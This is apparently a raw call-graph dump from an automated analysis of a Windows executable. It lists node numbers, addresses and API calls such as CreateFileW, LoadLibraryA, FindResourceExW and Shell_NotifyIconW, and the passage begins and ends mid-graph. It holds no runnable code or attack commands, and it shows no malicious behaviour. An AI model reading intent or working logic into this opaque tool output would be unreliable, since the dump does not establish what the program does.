7ff64392ee20 5 API calls Concurrency::wait 98999->99334 99003 7ff643944c68 4 API calls 99000->99003 99002 7ff64397a7bc 99004 7ff64392f066 99003->99004 99006 7ff64392f08f 99004->99006 99333 7ff64392f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99004->99333 99329 7ff64392f1bc 99006->99329 99008 7ff64392f0c6 99008->98866 99010 7ff643925ac6 99009->99010 99011 7ff643925ae4 99009->99011 99012 7ff64392e0a8 4 API calls 99010->99012 99013 7ff643927cf4 4 API calls 99011->99013 99014 7ff64392592d 99012->99014 99013->99014 99015 7ff643948e28 99014->99015 99016 7ff643948ea4 99015->99016 99017 7ff643948e3f 99015->99017 99338 7ff643948d98 35 API calls 2 library calls 99016->99338 99027 7ff643948e63 99017->99027 99336 7ff6439555d4 15 API calls _mbstowcs_s_l 99017->99336 99020 7ff643948ed6 99022 7ff643948ee2 99020->99022 99024 7ff643948ef9 99020->99024 99021 7ff643948e49 99337 7ff64395b164 31 API calls _invalid_parameter_noinfo 99021->99337 99339 7ff6439555d4 15 API calls _mbstowcs_s_l 99022->99339 99030 7ff643952c80 37 API calls wcsftime 99024->99030 99031 7ff643948ef2 99024->99031 99026 7ff643948e54 99026->98883 99027->98883 99028 7ff643948ee7 99340 7ff64395b164 31 API calls _invalid_parameter_noinfo 99028->99340 99030->99024 99031->98883 99034 7ff64392dfac 99032->99034 99033 7ff643944c68 4 API calls 99035 7ff6439259f5 99033->99035 99034->99033 99034->99035 99036 7ff64392d670 99035->99036 99037 7ff64392d698 99036->99037 99041 7ff64392d6a2 99037->99041 99341 7ff64392880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99037->99341 99040 7ff643979d43 99042 7ff64392d7de 99041->99042 99342 7ff64392ee20 5 API calls Concurrency::wait 99041->99342 99042->98914 99044 7ff6439a29c8 99043->99044 99343 7ff6439a2b70 99044->99343 99047 7ff6439a29de 99047->98857 99048 7ff6439267d8 45 API calls 99049 7ff6439a2a03 99048->99049 99050 7ff6439267d8 45 API calls 99049->99050 99051 7ff6439a2a23 99050->99051 99052 7ff6439267d8 45 API calls 99051->99052 99053 7ff6439a2a49 99052->99053 99054 7ff6439267d8 45 API calls 99053->99054 99055 7ff6439a2a6d 99054->99055 99056 7ff6439267d8 45 API calls 99055->99056 99057 7ff6439a2ac5 99056->99057 99058 7ff6439a240c 32 API calls 99057->99058 99059 7ff6439a2ada 99058->99059 99059->99047 99348 7ff6439a1d48 99059->99348 99062 7ff643926542 99061->99062 99063 7ff64392653d 99061->99063 99065 7ff643926558 99062->99065 99066 7ff64392656f FreeLibrary 99062->99066 99064 7ff643954970 62 API calls 99063->99064 99064->99062 99065->98868 99066->99065 99068 7ff64392a7c0 4 API calls 99067->99068 99069 7ff643929d99 99068->99069 99069->98959 99071 7ff643926490 99070->99071 99072 7ff643926d74 LoadLibraryA 99070->99072 99071->98973 99071->98974 99072->99071 99073 7ff643926d89 GetProcAddress 99072->99073 99073->99071 99075 7ff6439547fc 99074->99075 99076 7ff64395482a 99075->99076 99079 7ff64395485c 99075->99079 99135 7ff6439555d4 15 API calls _mbstowcs_s_l 99076->99135 99078 7ff64395482f 99136 7ff64395b164 31 API calls _invalid_parameter_noinfo 99078->99136 99081 7ff643954862 99079->99081 99082 7ff64395486f 99079->99082 99137 7ff6439555d4 15 API calls _mbstowcs_s_l 99081->99137 99123 7ff64395feb4 99082->99123 99083 7ff6439264cf 99083->98979 99083->98980 99087 7ff643954883 99138 7ff6439555d4 15 API calls _mbstowcs_s_l 99087->99138 99088 7ff643954890 99130 7ff643960304 99088->99130 99091 7ff6439548a3 99139 7ff64394df60 LeaveCriticalSection 99091->99139 99277 7ff643926d1c 99093->99277 99096 7ff643926cf1 99097 7ff643926d0f FreeLibrary 99096->99097 99098 7ff6439264f7 99096->99098 99097->99098 99100 7ff643926580 99098->99100 99099 7ff643926d1c 2 API calls 99099->99096 99101 7ff643944c68 4 API calls 99100->99101 99102 7ff6439265b5 memcpy_s 99101->99102 99103 7ff64396c9f5 99102->99103 99104 7ff643926740 CreateStreamOnHGlobal 99102->99104 99113 7ff643926602 99102->99113 99281 7ff6439a2e00 45 API calls 99103->99281 99106 7ff643926759 FindResourceExW 99104->99106 99104->99113 99106->99113 99107 7ff64396c97e LoadResource 99109 7ff64396c997 SizeofResource 99107->99109 99107->99113 99108 7ff6439267d8 45 API calls 99108->99113 99111 7ff64396c9ae LockResource 99109->99111 99109->99113 99110 7ff64396c9fd 99112 7ff6439267d8 45 API calls 99110->99112 99111->99113 99114 7ff6439266e8 99112->99114 99113->99107 99113->99108 99113->99110 99113->99114 99114->98987 99116 7ff64396ca6c 99115->99116 99117 7ff6439267f7 99115->99117 99282 7ff643954c5c 99117->99282 99120 7ff6439a240c 99301 7ff6439a2200 99120->99301 99122 7ff6439a2430 99122->98995 99140 7ff64395b9bc EnterCriticalSection 99123->99140 99125 7ff64395fecb 99126 7ff64395ff54 18 API calls 99125->99126 99127 7ff64395fed6 99126->99127 99128 7ff64395ba10 _isindst LeaveCriticalSection 99127->99128 99129 7ff643954879 99128->99129 99129->99087 99129->99088 99141 7ff643960040 99130->99141 99133 7ff64396035e 99133->99091 99135->99078 99136->99083 99137->99083 99138->99083 99142 7ff64396007d try_get_function 99141->99142 99142->99142 99152 7ff643960211 99142->99152 99156 7ff64394db68 37 API calls 3 library calls 99142->99156 99144 7ff6439602de 99160 7ff64395b164 31 API calls _invalid_parameter_noinfo 99144->99160 99146 7ff64396021a 99146->99133 99153 7ff643967738 99146->99153 99148 7ff643960277 99148->99152 99157 7ff64394db68 37 API calls 3 library calls 99148->99157 99150 7ff64396029a 99150->99152 99158 7ff64394db68 37 API calls 3 library calls 99150->99158 99152->99146 99159 7ff6439555d4 15 API calls _mbstowcs_s_l 99152->99159 99161 7ff643966d04 99153->99161 99156->99148 99157->99150 99158->99152 99159->99144 99160->99146 99162 7ff643966d28 99161->99162 99163 7ff643966d40 99161->99163 99215 7ff6439555d4 15 API calls _mbstowcs_s_l 99162->99215 99163->99162 99165 7ff643966d6d 99163->99165 99172 7ff643967348 99165->99172 99166 7ff643966d2d 99216 7ff64395b164 31 API calls _invalid_parameter_noinfo 99166->99216 99170 7ff643966d39 99170->99133 99218 7ff643967078 99172->99218 99175 7ff6439673bc 99250 7ff6439555b4 15 API calls _mbstowcs_s_l 99175->99250 99176 7ff6439673d3 99238 7ff64395e418 99176->99238 99180 7ff6439673f7 CreateFileW 99182 7ff6439674eb GetFileType 99180->99182 99183 7ff643967469 99180->99183 99181 7ff6439673df 99252 7ff6439555b4 15 API calls _mbstowcs_s_l 99181->99252 99187 7ff643967549 99182->99187 99188 7ff6439674f8 GetLastError 99182->99188 99186 7ff6439674b8 GetLastError 99183->99186 99190 7ff643967478 CreateFileW 99183->99190 99254 7ff643955564 15 API calls 2 library calls 99186->99254 99257 7ff64395e334 16 API calls 2 library calls 99187->99257 99255 7ff643955564 15 API calls 2 library calls 99188->99255 99189 7ff6439673e4 99253 7ff6439555d4 15 API calls _mbstowcs_s_l 99189->99253 99190->99182 99190->99186 99194 7ff6439673c1 99251 7ff6439555d4 15 API calls _mbstowcs_s_l 99194->99251 99195 7ff643967507 CloseHandle 99195->99194 99197 7ff643967539 99195->99197 99256 7ff6439555d4 15 API calls _mbstowcs_s_l 99197->99256 99198 7ff643967568 99200 7ff6439675b5 99198->99200 99258 7ff643967284 67 API calls 2 library calls 99198->99258 99205 7ff6439675ec 99200->99205 99259 7ff643966de4 67 API calls 4 library calls 99200->99259 99201 7ff64396753e 99201->99194 99204 7ff6439675e8 99204->99205 99206 7ff6439675fe 99204->99206 99260 7ff6439604b8 99205->99260 99208 7ff643966d95 99206->99208 99209 7ff643967681 CloseHandle CreateFileW 99206->99209 99208->99170 99217 7ff64395e3f4 LeaveCriticalSection 99208->99217 99210 7ff6439676cb GetLastError 99209->99210 99211 7ff6439676f9 99209->99211 99275 7ff643955564 15 API calls 2 library calls 99210->99275 99211->99208 99213 7ff6439676d8 99276 7ff64395e548 16 API calls 2 library calls 99213->99276 99215->99166 99216->99170 99219 7ff6439670a4 99218->99219 99227 7ff6439670be 99218->99227 99220 7ff6439555d4 _mbstowcs_s_l 15 API calls 99219->99220 99219->99227 99221 7ff6439670b3 99220->99221 99222 7ff64395b164 _invalid_parameter_noinfo 31 API calls 99221->99222 99222->99227 99223 7ff64396718c 99225 7ff643952554 31 API calls 99223->99225 99236 7ff6439671ec 99223->99236 99224 7ff64396713b 99224->99223 99226 7ff6439555d4 _mbstowcs_s_l 15 API calls 99224->99226 99228 7ff6439671e8 99225->99228 99229 7ff643967181 99226->99229 99227->99224 99230 7ff6439555d4 _mbstowcs_s_l 15 API calls 99227->99230 99231 7ff64396726b 99228->99231 99228->99236 99232 7ff64395b164 _invalid_parameter_noinfo 31 API calls 99229->99232 99233 7ff643967130 99230->99233 99234 7ff64395b184 _isindst 16 API calls 99231->99234 99232->99223 99235 7ff64395b164 _invalid_parameter_noinfo 31 API calls 99233->99235 99237 7ff643967280 99234->99237 99235->99224 99236->99175 99236->99176 99239 7ff64395b9bc _isindst EnterCriticalSection 99238->99239 99246 7ff64395e43b 99239->99246 99240 7ff64395e487 99242 7ff64395ba10 _isindst LeaveCriticalSection 99240->99242 99241 7ff64395e464 99243 7ff64395e170 16 API calls 99241->99243 99244 7ff64395e52a 99242->99244 99245 7ff64395e469 99243->99245 99244->99180 99244->99181 99245->99240 99248 7ff64395e310 wprintf EnterCriticalSection 99245->99248 99246->99240 99246->99241 99247 7ff64395e4c2 EnterCriticalSection 99246->99247 99247->99240 99249 7ff64395e4d1 LeaveCriticalSection 99247->99249 99248->99240 99249->99246 99250->99194 99251->99208 99252->99189 99253->99194 99254->99194 99255->99195 99256->99201 99257->99198 99258->99200 99259->99204 99261 7ff64395e604 31 API calls 99260->99261 99263 7ff6439604cc 99261->99263 99262 7ff6439604d2 99264 7ff64395e548 16 API calls 99262->99264 99263->99262 99266 7ff64395e604 31 API calls 99263->99266 99274 7ff64396050c 99263->99274 99265 7ff643960534 99264->99265 99268 7ff643960560 99265->99268 99271 7ff643955564 fread_s 15 API calls 99265->99271 99269 7ff6439604ff 99266->99269 99267 7ff64395e604 31 API calls 99270 7ff643960518 CloseHandle 99267->99270 99268->99208 99272 7ff64395e604 31 API calls 99269->99272 99270->99262 99273 7ff643960525 GetLastError 99270->99273 99271->99268 99272->99274 99273->99262 99274->99262 99274->99267 99275->99213 99276->99211 99278 7ff643926d2c LoadLibraryA 99277->99278 99279 7ff643926ce3 99277->99279 99278->99279 99280 7ff643926d41 GetProcAddress 99278->99280 99279->99096 99279->99099 99280->99279 99281->99110 99285 7ff643954c7c 99282->99285 99286 7ff64392680a 99285->99286 99287 7ff643954ca6 99285->99287 99286->99120 99287->99286 99288 7ff643954cd7 99287->99288 99289 7ff643954cb5 fread_s 99287->99289 99300 7ff64394df54 EnterCriticalSection 99288->99300 99298 7ff6439555d4 15 API calls _mbstowcs_s_l 99289->99298 99293 7ff643954cca 99299 7ff64395b164 31 API calls _invalid_parameter_noinfo 99293->99299 99298->99293 99299->99286 99304 7ff6439547bc 99301->99304 99303 7ff6439a2210 99303->99122 99307 7ff643954724 99304->99307 99308 7ff643954746 99307->99308 99309 7ff643954732 99307->99309 99311 7ff643954742 99308->99311 99317 7ff64395bef8 6 API calls __crtLCMapStringW 99308->99317 99315 7ff6439555d4 15 API calls _mbstowcs_s_l 99309->99315 99311->99303 99313 7ff643954737 99316 7ff64395b164 31 API calls _invalid_parameter_noinfo 99313->99316 99315->99313 99316->99311 99317->99311 99319 7ff643931a48 99318->99319 99320 7ff643931c5f 99318->99320 99325 7ff643931a90 99319->99325 99335 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99319->99335 99320->98998 99325->98998 99330 7ff64392f1ce 99329->99330 99332 7ff64392f1d8 99329->99332 99331 7ff643931a30 45 API calls 99330->99331 99331->99332 99332->99008 99333->99006 99334->99002 99336->99021 99337->99026 99338->99020 99339->99028 99340->99031 99341->99041 99342->99040 99344 7ff6439a2bae 99343->99344 99345 7ff6439a29da 99344->99345 99346 7ff6439267d8 45 API calls 99344->99346 99347 7ff6439a240c 32 API calls 99344->99347 99345->99047 99345->99048 99346->99344 99347->99344 99349 7ff6439a1d61 99348->99349 99350 7ff6439a1d71 99348->99350 99351 7ff6439548e0 89 API calls 99349->99351 99352 7ff6439a1dbf 99350->99352 99353 7ff6439548e0 89 API calls 99350->99353 99369 7ff6439a1d7a 99350->99369 99351->99350 99375 7ff6439a2038 99352->99375 99355 7ff6439a1d9e 99353->99355 99355->99352 99357 7ff6439a1da7 99355->99357 99356 7ff6439a1df5 99358 7ff6439a1df9 99356->99358 99359 7ff6439a1e1c 99356->99359 99357->99369 99387 7ff643954970 99357->99387 99361 7ff6439a1e07 99358->99361 99362 7ff643954970 62 API calls 99358->99362 99363 7ff6439a1e4a 99359->99363 99364 7ff6439a1e2a 99359->99364 99365 7ff643954970 62 API calls 99361->99365 99361->99369 99362->99361 99379 7ff6439a1e88 99363->99379 99367 7ff643954970 62 API calls 99364->99367 99368 7ff6439a1e38 99364->99368 99365->99369 99367->99368 99368->99369 99370 7ff643954970 62 API calls 99368->99370 99369->99047 99370->99369 99371 7ff6439a1e52 99372 7ff6439a1e68 99371->99372 99373 7ff643954970 62 API calls 99371->99373 99372->99369 99374 7ff643954970 62 API calls 99372->99374 99373->99372 99374->99369 99376 7ff6439a2056 memcpy_s 99375->99376 99377 7ff6439a2069 99375->99377 99376->99356 99378 7ff643954c5c _fread_nolock 45 API calls 99377->99378 99378->99376 99380 7ff6439a1fb0 99379->99380 99385 7ff6439a1eaa 99379->99385 99383 7ff6439a1fd3 99380->99383 99401 7ff643952a04 60 API calls 2 library calls 99380->99401 99382 7ff6439a1bd0 45 API calls 99382->99385 99383->99371 99385->99380 99385->99382 99385->99383 99385->99385 99399 7ff6439a1c9c 45 API calls 99385->99399 99400 7ff6439a20cc 60 API calls 99385->99400 99388 7ff6439549a3 99387->99388 99389 7ff64395498e 99387->99389 99398 7ff64395499e 99388->99398 99402 7ff64394df54 EnterCriticalSection 99388->99402 99403 7ff6439555d4 15 API calls _mbstowcs_s_l 99389->99403 99391 7ff643954993 99404 7ff64395b164 31 API calls _invalid_parameter_noinfo 99391->99404 99394 7ff6439549b9 99395 7ff6439548ec 60 API calls 99394->99395 99396 7ff6439549c2 99395->99396 99397 7ff64394df60 fread_s LeaveCriticalSection 99396->99397 99397->99398 99398->99369 99399->99385 99400->99385 99401->99383 99403->99391 99404->99398 99406 7ff643968f90 wcsftime 99405->99406 99407 7ff643923ec4 GetLongPathNameW 99406->99407 99408 7ff643927cf4 4 API calls 99407->99408 99409 7ff643923eed 99408->99409 99410 7ff643924074 99409->99410 99411 7ff643929640 4 API calls 99410->99411 99412 7ff64392408e 99411->99412 99413 7ff6439256d4 5 API calls 99412->99413 99414 7ff64392409b 99413->99414 99415 7ff6439240a7 99414->99415 99416 7ff64396bada 99414->99416 99417 7ff643924680 4 API calls 99415->99417 99421 7ff64396bb0f 99416->99421 99457 7ff643941ad0 CompareStringW 99416->99457 99419 7ff6439240b5 99417->99419 99453 7ff6439240e8 99419->99453 99422 7ff6439240cb Concurrency::wait 99422->98931 99424 7ff643926460 105 API calls 99423->99424 99425 7ff6439263e5 99424->99425 99426 7ff64396c656 99425->99426 99428 7ff643926460 105 API calls 99425->99428 99427 7ff6439a2948 90 API calls 99426->99427 99430 7ff64396c66e 99427->99430 99429 7ff643926400 99428->99429 99429->99426 99431 7ff643926408 99429->99431 99432 7ff64396c672 99430->99432 99433 7ff64396c690 99430->99433 99434 7ff64396c67b 99431->99434 99435 7ff643926414 99431->99435 99436 7ff64392652c 63 API calls 99432->99436 99437 7ff643944c68 4 API calls 99433->99437 99459 7ff64399c5c8 77 API calls wprintf 99434->99459 99458 7ff64392e774 143 API calls Concurrency::wait 99435->99458 99436->99434 99452 7ff64396c6dd Concurrency::wait 99437->99452 99440 7ff643926438 99440->98925 99441 7ff64396c68a 99441->99433 99442 7ff64396c895 99443 7ff64392652c 63 API calls 99442->99443 99451 7ff64396c8a9 99443->99451 99448 7ff64392ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99448->99452 99451->99442 99465 7ff6439976d8 77 API calls 3 library calls 99451->99465 99452->99442 99452->99448 99452->99451 99460 7ff643997400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99452->99460 99461 7ff64399730c 39 API calls 99452->99461 99462 7ff6439a0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99452->99462 99463 7ff64392b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99452->99463 99464 7ff643929940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99452->99464 99454 7ff643924107 99453->99454 99456 7ff643924130 memcpy_s 99453->99456 99455 7ff643944c68 4 API calls 99454->99455 99455->99456 99456->99422 99457->99416 99458->99440 99459->99441 99460->99452 99461->99452 99462->99452 99463->99452 99464->99452 99465->99451 99467 7ff643929762 99466->99467 99473 7ff64392988d 99466->99473 99468 7ff643944c68 4 API calls 99467->99468 99467->99473 99470 7ff643929791 99468->99470 99469 7ff643944c68 4 API calls 99471 7ff64392981c 99469->99471 99470->99469 99471->99473 99478 7ff64392abe0 81 API calls 2 library calls 99471->99478 99479 7ff643929940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99471->99479 99480 7ff64392b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99471->99480 99473->98936 99476->98939 99477->98941 99478->99471 99479->99471 99480->99471 99481->98951 99482 7ff643948fac 99483 7ff64394901c 99482->99483 99484 7ff643948fd2 GetModuleHandleW 99482->99484 99499 7ff64395b9bc EnterCriticalSection 99483->99499 99484->99483 99493 7ff643948fdf 99484->99493 99486 7ff6439490cb 99487 7ff64395ba10 _isindst LeaveCriticalSection 99486->99487 99489 7ff6439490f0 99487->99489 99488 7ff6439490a0 99490 7ff6439490b8 99488->99490 99494 7ff64395ada4 75 API calls 99488->99494 99492 7ff6439490fc 99489->99492 99497 7ff643949118 11 API calls 99489->99497 99495 7ff64395ada4 75 API calls 99490->99495 99491 7ff643949026 99491->99486 99491->99488 99496 7ff64395aa8c 30 API calls 99491->99496 99493->99483 99500 7ff643949164 GetModuleHandleExW 99493->99500 99494->99490 99495->99486 99496->99488 99497->99492 99501 7ff6439491b5 99500->99501 99502 7ff64394918e GetProcAddress 99500->99502 99504 7ff6439491c5 99501->99504 99505 7ff6439491bf FreeLibrary 99501->99505 99502->99501 99503 7ff6439491a8 99502->99503 99503->99501 99504->99483 99505->99504 99506 7ff64395c51c 99507 7ff64395c567 99506->99507 99511 7ff64395c52b fread_s 99506->99511 99514 7ff6439555d4 15 API calls _mbstowcs_s_l 99507->99514 99508 7ff64395c54e HeapAlloc 99510 7ff64395c565 99508->99510 99508->99511 99511->99507 99511->99508 99513 7ff64394925c EnterCriticalSection LeaveCriticalSection fread_s 99511->99513 99513->99511 99514->99510 99515 7ff643932c17 99518 7ff6439314a0 99515->99518 99517 7ff643932c2a 99519 7ff6439314d3 99518->99519 99520 7ff64397be31 99519->99520 99523 7ff64397bdf2 99519->99523 99524 7ff64397bdd1 99519->99524 99551 7ff6439314fa fread_s 99519->99551 99566 7ff6439b8f48 300 API calls 3 library calls 99520->99566 99525 7ff64397be19 99523->99525 99564 7ff6439b9a88 300 API calls 4 library calls 99523->99564 99526 7ff64397bddb 99524->99526 99524->99551 99565 7ff6439a34e4 77 API calls 3 library calls 99525->99565 99563 7ff6439b9514 300 API calls 99526->99563 99528 7ff643931884 99554 7ff643942130 45 API calls 99528->99554 99530 7ff643931815 99530->99517 99535 7ff643931898 99535->99517 99536 7ff643931a30 45 API calls 99536->99551 99541 7ff643942130 45 API calls 99541->99551 99544 7ff64397bfe4 99569 7ff6439b93a4 77 API calls 99544->99569 99546 7ff643933c20 300 API calls 99546->99551 99548 7ff64392e0a8 4 API calls 99548->99551 99549 7ff643931799 99549->99530 99570 7ff6439a34e4 77 API calls 3 library calls 99549->99570 99551->99528 99551->99530 99551->99536 99551->99541 99551->99544 99551->99546 99551->99548 99551->99549 99553 7ff64392ef9c 46 API calls 99551->99553 99555 7ff6439420d0 45 API calls 99551->99555 99556 7ff643925af8 300 API calls 99551->99556 99557 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99551->99557 99558 7ff6439435c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99551->99558 99559 7ff643944f0c 34 API calls _onexit 99551->99559 99560 7ff6439450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99551->99560 99561 7ff6439436c4 77 API calls 99551->99561 99562 7ff6439437dc 300 API calls 99551->99562 99567 7ff64392ee20 5 API calls Concurrency::wait 99551->99567 99568 7ff64398ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99551->99568 99553->99551 99554->99535 99555->99551 99556->99551 99558->99551 99559->99551 99561->99551 99562->99551 99563->99530 99564->99525 99565->99520 99566->99551 99567->99551 99568->99551 99569->99549 99570->99549 99571 7ff643925dec 99572 7ff643925df4 99571->99572 99573 7ff643925e98 99572->99573 99574 7ff643925e28 99572->99574 99602 7ff643925e96 99572->99602 99575 7ff64396c229 99573->99575 99576 7ff643925e9e 99573->99576 99577 7ff643925f21 PostQuitMessage 99574->99577 99578 7ff643925e35 99574->99578 99627 7ff64393ede4 8 API calls 99575->99627 99580 7ff643925ecc SetTimer RegisterWindowMessageW 99576->99580 99581 7ff643925ea5 99576->99581 99585 7ff643925e7c 99577->99585 99582 7ff643925e40 99578->99582 99583 7ff64396c2af 99578->99583 99579 7ff643925e6b DefWindowProcW 99579->99585 99580->99585 99588 7ff643925efc CreatePopupMenu 99580->99588 99586 7ff64396c1b8 99581->99586 99587 7ff643925eae KillTimer 99581->99587 99589 7ff643925e49 99582->99589 99590 7ff643925f2b 99582->99590 99639 7ff64399a40c 16 API calls fread_s 99583->99639 99593 7ff64396c1bd 99586->99593 99594 7ff64396c1f7 MoveWindow 99586->99594 99613 7ff643925d88 99587->99613 99588->99585 99589->99602 99603 7ff643925f0b 99589->99603 99604 7ff643925e5f 99589->99604 99617 7ff643944610 99590->99617 99592 7ff64396c255 99628 7ff643942c44 47 API calls Concurrency::wait 99592->99628 99599 7ff64396c1e4 SetFocus 99593->99599 99600 7ff64396c1c2 99593->99600 99594->99585 99596 7ff64396c2c3 99596->99579 99596->99585 99599->99585 99600->99604 99605 7ff64396c1cb 99600->99605 99602->99579 99625 7ff643925f3c 26 API calls fread_s 99603->99625 99604->99579 99610 7ff643925d88 Shell_NotifyIconW 99604->99610 99626 7ff64393ede4 8 API calls 99605->99626 99609 7ff643925f1f 99609->99585 99611 7ff64396c280 99610->99611 99629 7ff643926258 99611->99629 99614 7ff643925d99 fread_s 99613->99614 99615 7ff643925de4 99613->99615 99616 7ff643925db8 Shell_NotifyIconW 99614->99616 99624 7ff643927098 DeleteObject DestroyWindow Concurrency::wait 99615->99624 99616->99615 99618 7ff6439446db 99617->99618 99619 7ff64394461a fread_s 99617->99619 99618->99585 99640 7ff6439272c8 99619->99640 99621 7ff6439446a2 KillTimer SetTimer 99621->99618 99622 7ff643944660 99622->99621 99623 7ff64398aaa1 Shell_NotifyIconW 99622->99623 99623->99621 99624->99585 99625->99609 99626->99585 99627->99592 99628->99604 99630 7ff643926287 fread_s 99629->99630 99667 7ff6439261c4 99630->99667 99633 7ff64392632d 99635 7ff64396c644 Shell_NotifyIconW 99633->99635 99636 7ff64392634e Shell_NotifyIconW 99633->99636 99637 7ff6439272c8 6 API calls 99636->99637 99638 7ff643926365 99637->99638 99638->99602 99639->99596 99641 7ff6439272f4 99640->99641 99660 7ff6439273bc Concurrency::wait 99640->99660 99662 7ff6439298e8 99641->99662 99643 7ff643927303 99644 7ff64396cdfc LoadStringW 99643->99644 99645 7ff643927310 99643->99645 99648 7ff64396ce1e 99644->99648 99646 7ff643927cf4 4 API calls 99645->99646 99647 7ff643927324 99646->99647 99650 7ff643927336 99647->99650 99651 7ff64396ce30 99647->99651 99649 7ff64392e0a8 4 API calls 99648->99649 99657 7ff64392734f wcscpy fread_s 99649->99657 99650->99648 99652 7ff643927343 99650->99652 99666 7ff643927c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 99651->99666 99665 7ff643927c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 99652->99665 99655 7ff64396ce3c 99656 7ff6439271f8 4 API calls 99655->99656 99655->99657 99658 7ff64396ce63 99656->99658 99659 7ff6439273a3 Shell_NotifyIconW 99657->99659 99661 7ff6439271f8 4 API calls 99658->99661 99659->99660 99660->99622 99661->99657 99663 7ff643944c68 4 API calls 99662->99663 99664 7ff643929918 99663->99664 99664->99643 99665->99657 99666->99655 99668 7ff64396c5f8 99667->99668 99669 7ff6439261e0 99667->99669 99668->99669 99670 7ff64396c602 DestroyIcon 99668->99670 99669->99633 99671 7ff64399ad94 39 API calls wcsftime 99669->99671 99670->99669 99671->99633 99672 7ff6439347e1 99673 7ff643934d57 99672->99673 99677 7ff6439347f2 99672->99677 99737 7ff64392ee20 5 API calls Concurrency::wait 99673->99737 99675 7ff643934d66 99738 7ff64392ee20 5 API calls Concurrency::wait 99675->99738 99677->99675 99678 7ff643934862 99677->99678 99679 7ff643934df3 99677->99679 99700 7ff643933c80 99678->99700 99702 7ff6439366c0 99678->99702 99739 7ff6439a0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99679->99739 99682 7ff6439805be 99683 7ff6439805d1 99682->99683 99741 7ff6439a34e4 77 API calls 3 library calls 99682->99741 99686 7ff643934ac0 99687 7ff643944f0c 34 API calls __scrt_initialize_thread_safe_statics 99687->99700 99688 7ff643934fe7 99692 7ff64392e0a8 4 API calls 99688->99692 99689 7ff643933dde 99690 7ff64392e0a8 4 API calls 99690->99689 99691 7ff64397fefe 99695 7ff64392e0a8 4 API calls 99691->99695 99692->99689 99693 7ff64392e0a8 4 API calls 99693->99700 99694 7ff643934a8f 99694->99686 99694->99691 99696 7ff643934aa9 99694->99696 99695->99686 99696->99686 99696->99690 99698 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99698->99700 99699 7ff643929640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99699->99700 99700->99682 99700->99687 99700->99688 99700->99689 99700->99693 99700->99694 99700->99696 99700->99698 99700->99699 99701 7ff6439450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 99700->99701 99736 7ff643935360 300 API calls Concurrency::wait 99700->99736 99740 7ff6439a34e4 77 API calls 3 library calls 99700->99740 99701->99700 99720 7ff64393673b memcpy_s Concurrency::wait 99702->99720 99704 7ff643981fac 99866 7ff6439bab30 300 API calls Concurrency::wait 99704->99866 99706 7ff643981fbe 99706->99700 99707 7ff64392ec00 4 API calls 99707->99720 99708 7ff643936c0f 99709 7ff643936c3d 99708->99709 99710 7ff643981fc9 99708->99710 99863 7ff64392ee20 5 API calls Concurrency::wait 99709->99863 99867 7ff6439a34e4 77 API calls 3 library calls 99710->99867 99713 7ff643936c4a 99864 7ff643941fcc 300 API calls 99713->99864 99716 7ff643936d40 9 API calls 99716->99720 99718 7ff643944c68 4 API calls 99718->99720 99719 7ff643936c78 99865 7ff64393e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99719->99865 99720->99704 99720->99707 99720->99708 99720->99710 99720->99713 99720->99716 99720->99718 99720->99719 99723 7ff643933c20 300 API calls 99720->99723 99724 7ff6439820c1 99720->99724 99725 7ff643982032 99720->99725 99726 7ff64392e0a8 4 API calls 99720->99726 99728 7ff643936b15 99720->99728 99742 7ff6439a8ea0 99720->99742 99775 7ff6439a63dc 99720->99775 99780 7ff6439bf0ac 99720->99780 99783 7ff6439a5b80 99720->99783 99789 7ff6439bf160 99720->99789 99794 7ff6439a7e48 99720->99794 99828 7ff6439a8e98 99720->99828 99861 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99720->99861 99862 7ff6439450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99720->99862 99869 7ff6439b8d98 49 API calls Concurrency::wait 99720->99869 99723->99720 99724->99728 99870 7ff6439a34e4 77 API calls 3 library calls 99724->99870 99868 7ff6439a34e4 77 API calls 3 library calls 99725->99868 99726->99720 99728->99700 99736->99700 99737->99675 99738->99679 99739->99700 99740->99700 99741->99683 99743 7ff6439aa680 99742->99743 99750 7ff6439aa71a 99743->99750 99908 7ff64392834c 99743->99908 99745 7ff6439aa6f3 99745->99720 99747 7ff6439aa7fd 99936 7ff6439a1864 6 API calls 99747->99936 99748 7ff64392d4cc 48 API calls 99749 7ff6439aa6d0 99748->99749 99917 7ff643926838 99749->99917 99750->99745 99750->99747 99755 7ff6439aa770 99750->99755 99753 7ff6439aa805 99937 7ff64399b334 99753->99937 99871 7ff64392d4cc 99755->99871 99758 7ff6439aa6e6 99758->99745 99933 7ff643927ab8 99758->99933 99760 7ff6439aa7ee 99890 7ff64399b3a8 99760->99890 99761 7ff6439aa7a7 99764 7ff6439298e8 4 API calls 99761->99764 99763 7ff6439aa778 99763->99760 99763->99761 99766 7ff6439aa7b5 99764->99766 99767 